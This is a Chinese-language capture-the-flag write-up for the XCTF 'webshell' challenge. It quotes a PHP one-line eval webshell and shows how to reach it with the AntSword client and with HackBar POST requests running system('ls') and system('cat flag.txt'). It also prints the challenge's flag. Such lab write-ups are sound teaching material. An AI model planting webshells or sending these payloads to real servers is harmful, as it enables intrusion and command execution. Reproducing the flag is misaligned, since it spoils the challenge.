webshell
本题讲解两种办法:
第一种
题目如下图:
附上题目链接:https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=0&id=5070&page=1
这道题主要在于解题工具的准备,解题步骤很简单。工具可以用中国菜刀或者中国蚁剑,但是中国菜刀很容易下载到开有后门的恶意软件,故我用的是中国蚁剑。
(下载链接:中国蚁剑;下载和使用说明)
工具准备好之后,以下为解题步骤:
第一步:
打开蚁剑后直接在空白处右键点击“添加数据”出现这样的界面:
第二步:
添加URL地址即为:http://220.249.52.133:32109/
还要填写连接密码,根据题目的场景中提示的
<?php @eval($_POST['shell']);?>
试着填写“shell”,之后点击界面左上角的“添加”,出现:第三步:
出现flag文件,打开即出现结果
第二种
本方法更加简单,需要的工具是火狐浏览器中的插件“Hackbar”
添加插件方法可参考:https://jingyan.baidu.com/article/375c8e1984a71d64f3a22979.html
第一步:
用火狐浏览器打开题目场景,再打开添加好的“Hackbar”插件,界面如下第二步:
勾选Hackbar插件中的“Enable Post data”,然后构造如下POST请求来查看目录:
shell=system(‘ls’);
点击“Run”之后出现flag.txt文件
第三步:
构造如下POST请求来查看flag文件:
shell=system(‘cat flag.txt’);
点击“Run”之后出现结果
cyberpeace{1671cb9cdad6e8fd7d0f0d557ae3d215}